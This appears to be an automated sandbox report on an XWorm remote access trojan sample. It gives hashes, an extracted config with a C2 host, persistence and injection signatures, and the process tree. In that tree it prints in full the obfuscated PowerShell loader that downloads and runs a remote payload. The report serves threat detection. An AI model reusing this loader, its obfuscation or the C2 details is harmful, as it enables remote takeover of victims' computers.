xworm | a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336

General

Target

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Size

35KB
MD5

4e86daeb4a5259de4a75d2b4c5594b2d
SHA1

4b1a0ab2edec0db06ad74df5ebae90fa3ceb4d33
SHA256

a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336
SHA512

23362c22954daeb1bc7576bcccd87a786a0301957ff733064fe56f1b5c62eb19cfd35963b84a93e3ed8925cd3901a2e0d22947d76be4aa584893c5b9a4013e52
SSDEEP

384:ydvg9j00WbqxAMTayV5N+5maFZZL37WqpJm3/KNm0ns0VgtFMAmNLToZw/RZCvKt:y2B4QBTOl37Wn3CNUVFQ92/OMh+uvlC

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

3.1

C2

mayxw9402.duckdns.org:9402

Mutex

ZyV5MqKosTk3Hzpr

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1716-1-0x0000000000B10000-0x0000000000B20000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 36 IoCs

Processes:

powershell.exe

flow	pid	process
5	2848	powershell.exe
6	2848	powershell.exe
7	2848	powershell.exe
8	2848	powershell.exe
9	2848	powershell.exe
10	2848	powershell.exe
11	2848	powershell.exe
12	2848	powershell.exe
13	2848	powershell.exe
14	2848	powershell.exe
15	2848	powershell.exe
16	2848	powershell.exe
17	2848	powershell.exe
18	2848	powershell.exe
19	2848	powershell.exe
20	2848	powershell.exe
21	2848	powershell.exe
22	2848	powershell.exe
23	2848	powershell.exe
24	2848	powershell.exe
25	2848	powershell.exe
26	2848	powershell.exe
27	2848	powershell.exe
28	2848	powershell.exe
29	2848	powershell.exe
30	2848	powershell.exe
31	2848	powershell.exe
32	2848	powershell.exe
33	2848	powershell.exe
34	2848	powershell.exe
35	2848	powershell.exe
36	2848	powershell.exe
37	2848	powershell.exe
38	2848	powershell.exe
39	2848	powershell.exe
40	2848	powershell.exe

Drops startup file 2 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.lnk	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exepowershell.exe

pid process

1716 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
2848 powershell.exe

pid	process
1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
2848	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
Token: SeDebugPrivilege	2848	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

pid process

1716 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

pid	process
1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exeWScript.exepowershell.exe

description	pid	process	target process
PID 1716 wrote to memory of 1916	1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe	WScript.exe
PID 1716 wrote to memory of 1916	1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe	WScript.exe
PID 1716 wrote to memory of 1916	1716	1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe	WScript.exe
PID 1916 wrote to memory of 2848	1916	WScript.exe	powershell.exe
PID 1916 wrote to memory of 2848	1916	WScript.exe	powershell.exe
PID 1916 wrote to memory of 2848	1916	WScript.exe	powershell.exe
PID 2848 wrote to memory of 1848	2848	powershell.exe	cmd.exe
PID 2848 wrote to memory of 1848	2848	powershell.exe	cmd.exe
PID 2848 wrote to memory of 1848	2848	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe
"C:\Users\Admin\AppData\Local\Temp\1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.exe"
1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\qyohla.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Polytyped = 1;$Chylification253='Sub';$Chylification253+='strin';$Chylification253+='g';Function alcoholist($Perissodactylous181){$Midwestward=$Perissodactylous181.Length-$Polytyped;For($Interventionisme=5;$Interventionisme -lt $Midwestward;$Interventionisme+=6){$Prveballoner+=$Perissodactylous181.$Chylification253.Invoke( $Interventionisme, $Polytyped);}$Prveballoner;}function Compulsed($Unmurmuringly74){& ($Besindet) ($Unmurmuringly74);}$Deltidsarbejderes=alcoholist 'AdfrdMTick,o RuntzBo meiK.dgel,ricllco,naa.leje/Unstr5 Lyop.As.le0Fors, Hu tk(Pl ttWGravei.anknnUafkld DennoHelssw,ascisCaddi JestiNTrassTLugtf .ardi1Papsv0Ndudg.Bidra0Drift;Afsni eapaW AmpuiSubson Proc6 Doso4Tr,pl;S,oke OdontxExecu6Goggl4Sca.r;,agso Bi,cerLustfvShirt:gulso1Mon.c2Dales1 Note.Frpla0C nte)Efter kabakGProvieMacrocBortrkE.piroD,ocl/ H,lf2Forin0 Stab1Sybot0 j.mb0 Njag1Ry,de0Opdag1Wordm Pan,eFBestiistuder StakeSte mfPremioGua hxLoyal/Waitl1Re,li2Immig1 Stvn.Slang0 Suit ';$Tjekkoslovaks=alcoholist 'Lo,gsUOutblsNedb,eJulehrSvi e-TelefA M xigForsieRebr.nIsos.tCount ';$Ingester=alcoholist 'ReliehFrys,tParletTilskp IntrsTelef: Back/Prep./Gen,edFlskee Hjt,.Plagih .ndke U.ioaFiflel.ataetFejlthStemma Ube n TierdAvls wDam.se Rotulafmagl SusunForsaeakutbsMakefs Kj.rbI terlKrmmeoKneblg Elgk. LignzRemiga Hje,.Ben,oc SstroForham Jepp/tuttycGynaev Spdb/P uffTFredej HarreLlebrn SmaaeSinnesKo.ib.P.intrOptimagest,rRdder ';$Physicobiological=alcoholist 'Desil>Su.id ';$Besindet=alcoholist 'Un eritranseGluerxa ema ';$Partiapparat='Tylen';$Cobolkommandoen = alcoholist 'In ele.algfcMalkohEndocoUnsk. Bob e%,doriaHo.nipBerigpSkaffd SardaAntimt,niffaTilbe%forb \Car.ubBronteRoccehpneumi prain UnistUnac,. Fosts wee hUnanir Inte Br,e&Plast&Jungm Mus,ie EcumcDemerh Ves oL tin aut,dtBedla ';Compulsed (alcoholist 'P.eno$ Ermig Sto l PhleoSki,lbGlassa B tel Time:EfterA .sopnpuffeoSiv,ttHydriuSignasAmbus=Earta(SumpecrimndmBowpidTurgo Rumv,/Telegc Lund Ra.l$ SubdCnaturo BesnbThoraoSkiltlMrskbkForfroTarifm.lotsmMorakaSkrydn esildTilsuoIntr,eDramanDiony)Pahse ');Compulsed (alcoholist 'L.sse$Trnaag BrdrlCentroParthbSkrida myxol Over: U,skSKanw.kNegabo exosvS.rpae Ex,rrOblan=Ges,f$Dob eIInd tn C,apgFe,rieligamsLsnintFog,de,uxemrelect.ApplisSedimp UdgrlBanksiY,gintMonoc(Pseu $InddrPBrutthDuvetyPrefisMetati F decBakkeo.incsbForesi RenvoP,sfolMetadoFleetgIagtti GryrcAbandaPrivalDou.h)Amage ');$Ingester=$Skover[0];$Rejnhards= (alcoholist 's.otc$EmbrygEneullGrovvo Bowdbvurdeap ntol drib:Ghe.tD.narmyWithisHaptetKrum sM.lin= MajoNStarteC.vilwLrker-OpbygOb,rebb Hyd,jPre.ee .jercKorrit Trn, DimerSTribeyPimpes urntPrevieZ,omamGranu.zetacNColiaeBlephtSa.ro..nferWAdv,keSamirb Kvr,CIndkvlFa heibrnefeRegulnMenigt');$Rejnhards+=$Anotus[1];Compulsed ($Rejnhards);Compulsed (alcoholist 'Udrre$SkokkD MiggyBioscsDugwatStatesUb.ry.HjlpeHNoseaeConfeaSand dVrneteTrivirSend.s .eas[Sagso$GadedT,otpojU,caje Aba.k icrok vandohypers BejdlThumpoTaarevterriaFa,iakBr,tnsC.lur]Buksh= Ggle$ KampDIncone emopl DecatMongoiBazoodGldess Af.oaGr mmrMarqubBloodegeonijLixend StereTr,sarBananep,efesSprut ');$Necrologies=alcoholist ' Afsy$KlumpDHove y DriksSinditBa,ersd sko..emorDMorsooDioptwS rkenIflg,lAeggeoorgana Cou.dVideoFDimaniMoonslgrecieGyres(Aflbs$ AediI .ndinGodsvgBesk.e S,hlsHearttDat,beRaastrSkatt,.anef$Dvrg,CStra,h CrypiDybstlJurisi esvrfDetekr HealuJor,sgFirmatJe.hueInsp rSporanR deleephras Stik)under ';$Chilifrugternes=$Anotus[0];Compulsed (alcoholist 'Domin$ Photgmaanel PreroAsyn.b,rdaga.ebenlObad.: raisMRespiePe rtrIna.tg .lufe ,romnKatascAntyde A.ko= Rede(RegnsT,arkeePapulsChanct Ap l- Du.iPAfg.vaRadiot ishbhColou Sa.au$ ngreCValglhB nitiHa,ynlVermii.ejlbf Tr nrTava,u rovkgSkibitRegureGstesrMadssnUn.ire DesisCrust) Okia ');while (!$Mergence) {Compulsed (alcoholist ' ,ulp$ Sireg,ravel,pirioUnilobJordoaMineslDiplo: agaB FejlrCenoboBrevswApulinSouthnFrifue ,lies Spi,sHorne1Overd2Sy,hi5K ffe=Opp,s$SacchtAnemorPantouUndupe,mpre ') ;Compulsed $Necrologies;Compulsed (alcoholist 'FredeS BoxftUd rma Udsor Skr,tPres,-Pol.gSAfgaslPrel eMeroce MisapAgerh Carin4Comic ');Compulsed (alcoholist ' S il$.ettigHandllRelenoDriftbTaskmaafskilCit,r:Bge oMCon eeVrng,r hartgTilkoeSprlln UdskcHy,pee ,her=Broek(BludgTNoncoeBrugesGym.ot ,egn-premoPlysteaGrofttInkomhFarve Ramad$MelinCOmegnhExtr icharml Sha.iKorrefMecharBrumbuD,lesgImportafsaaeKristrTan.hnYelleeKrystsenden)Decis ') ;Compulsed (alcoholist 'Count$C thogR odilInitioHyldebLo.enaFest.lRanin:Im.unUHighbnHom gmBrod.e nbeadPoet,iblodscRigsaiUnrefnMar eaProgrlRimta=Obsti$L.nglg.dsaglcertioR darb FantaPerislKnobn:Tmrerf orcioBolomr,arunkReforoSw,gsnTilvetSelsko.rugtr Lufte In.ttPodge+ Fora+Sterl% S.ov$retveSSun.hk K,pioBeativ HoejePre trT ope.Midt.c K nno Con u Ove.nAntistDet,i ') ;$Ingester=$Skover[$Unmedicinal];}$Tash=309240;$Frugtsukkerets=29256;Compulsed (alcoholist 'Kinas$PrimagMeta lPneumoUpfrobTrikoaAtriulAutog: ,orfHUrb,teNedspmOrkano BlastYmpnir Ptero basipEndevhIsseseSkill Isoqu=,ende AgatGCheireKokettreada-KardsCKontioIn.cunW,vectStaaleAl.opnEricat p.es Sc,ll$HomesCPedogh Ha.diSyn.elP.ngeiSlfanf Helir.praau Consgs.pert,akkeeLum nr GratnDomajeNath,s Snel ');Compulsed (alcoholist 'Boble$PrecogS adel Cr.soSemanbDesoraSputtlTrigo:NatioMopve.e InfetCo,iiaAp.erlHa.pbsLa.tikLysteaHo chbinc.ee imancoachevekslsStere Delet=Bedca Unsha[.ydetSB,lllyIndissLedd.tB.gnie Eli mMisda.AdephCSpiraoSacchnPrer.v lageeAfstnrUendetProbl]Sport: R,ak:Pl,nsF Conkr Di,coLamiamUnderBKrickaForsksAc.dieRev s6Arsen4ByrliSSterotDietar Meetisyst.n,alengFrems(Skfte$BatalHA,lgseTaf,emAlib,oCha ttuns rrLkkero,yttep Un.ohReexaeSurp ) Klav ');Compulsed (alcoholist ' Tre.$SalvngN nvalBuffeoBhenvbKlassa Undelreg,d:SmaasWR.touhDagafe D tuyFil,deFogyiy,hill Sirre=act v Super[ Sho.SKendeyDenunsCaprytKontrePreanmsolv,.PadgeTGaarde Grafx W.urtSnder.Optr EElegyn VerdcOx daoFootsd AnsgiPeewen K psgF lke] Beta: bran:.alynAAlderS,ollyCIndleIBilioISlren.TreetG ParaeGo iottilliSca.iatOctaprPelariGae.tnNondegOver.(Enigm$F lmcMNoneneDi.uct .aliaDaginlConses,orgrk lan augrisb etaleObjeknContieH eresMo um) Syre ');Compulsed (alcoholist 'Sange$NonthgMi.tnl No coFou,ab Schaa Vrell V rm: chorEKons lEnn.svVa beiBargonSt reaPre.n=Medal$ DetaWMedlehSkdete.lethyKomiteFerskyH,dro.Mon.bsT,ansu ResebReinesRe.letFluesrDressiFlaglnTrencgIn.vi(,ancr$IndusTHome.aHderss.kifthLseti,Testu$ StamFTorskrDisseuJobbegB.sint,aaobsZymoluPerknkJ,hankAtomseT lpir CatheDefortRejeksAchro)Sanit ');Compulsed $Elvina;"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\behint.shr && echo t"
4⤵
PID:1848

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\qyohla.vbs
Filesize
896KB

MD5
c6ea093c28624fba97ebea592736640c

SHA1
b989c4f2377c8cb0e362b0ad96238194ae0e534a

SHA256
4c50875efb6badccfe526c866dab42b2f6a40e8a490e1cb6119020ed4849dbce

SHA512
3194847043a76863b583bc386a3e90443132b18de9563ac98d940f22d9fd61c39109008ccd1f92fc2a3b05e3815998a62abfc820ec0e8b2c14a41d009bd51f58

Download Submit
memory/1716-0-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

Filesize
4KB

Download
memory/1716-1-0x0000000000B10000-0x0000000000B20000-memory.dmp

Filesize
64KB

Download
memory/1716-6-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/1716-11-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/2848-16-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/2848-17-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads